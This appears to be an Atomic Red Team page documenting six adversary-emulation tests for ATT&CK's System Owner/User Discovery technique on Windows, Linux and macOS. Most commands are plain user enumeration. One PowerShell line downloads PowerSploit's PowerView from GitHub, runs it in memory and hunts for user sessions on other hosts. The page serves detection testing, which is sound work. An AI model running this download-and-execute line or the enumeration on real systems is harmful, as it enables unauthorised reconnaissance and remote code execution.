Try it using Invoke-Atomic

System Owner/User Discovery

Description from ATT&CK

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the _**dscl . list /Users grep -v ''_ command can also be used to enumerate user accounts. Environment variables, such as _%USERNAME%_ and _$USER**, may also be used to access this information.

On network devices, Network Device CLI commands such as 

1

show users
and 
1

show ssh
can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

Atomic Tests

Atomic Test #1 - System Owner/User Discovery

Identify System owner or users on an endpoint.

Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.

Supported Platforms: windows

auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa

Inputs:

Name Description Type Default Value
computer_name Name of remote computer string localhost

Attack Commands: Run with command_prompt!

1
2
3
4
5
6
7
8
9

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

Atomic Test #2 - System Owner/User Discovery

Identify System owner or users on an endpoint

Upon successful execution, sh will stdout list of usernames.

Supported Platforms: freebsd,linux,macos

auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c

Inputs:

None

Attack Commands: Run with sh!

1
2
3
4

users
w
who

Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)

Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.

Supported Platforms: windows

auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca

Inputs:

None

Attack Commands: Run with powershell!

1
2
3

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

Atomic Test #4 - User Discovery With Env Vars PowerShell Script

Use the PowerShell environment variables to identify the current logged user.

Supported Platforms: windows

auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51

Inputs:

None

Attack Commands: Run with powershell!

1
2
3

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

Cleanup Commands:

1
2

Remove-Item -Path .\CurrentactiveUser.txt -Force

Atomic Test #5 - GetCurrent User with PowerShell Script

Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.

Supported Platforms: windows

auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b

Inputs:

None

Attack Commands: Run with powershell!

1
2

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

Cleanup Commands:

1
2

Remove-Item -Path .\CurrentUserObject.txt -Force

Atomic Test #6 - System Discovery - SocGholish whoami

SocGholish performs whoami discovery commands and outputs the results to a tmp file. The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.

Reference: https://redcanary.com/threat-detection-report/threats/socgholish/

Supported Platforms: windows

auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7

Inputs:

Name Description Type Default Value
output_path Location of output file string $env:temp

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10
11
12

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

Cleanup Commands:

1
2

Remove-Item -Path #{output_path}\rad*.tmp -Force

source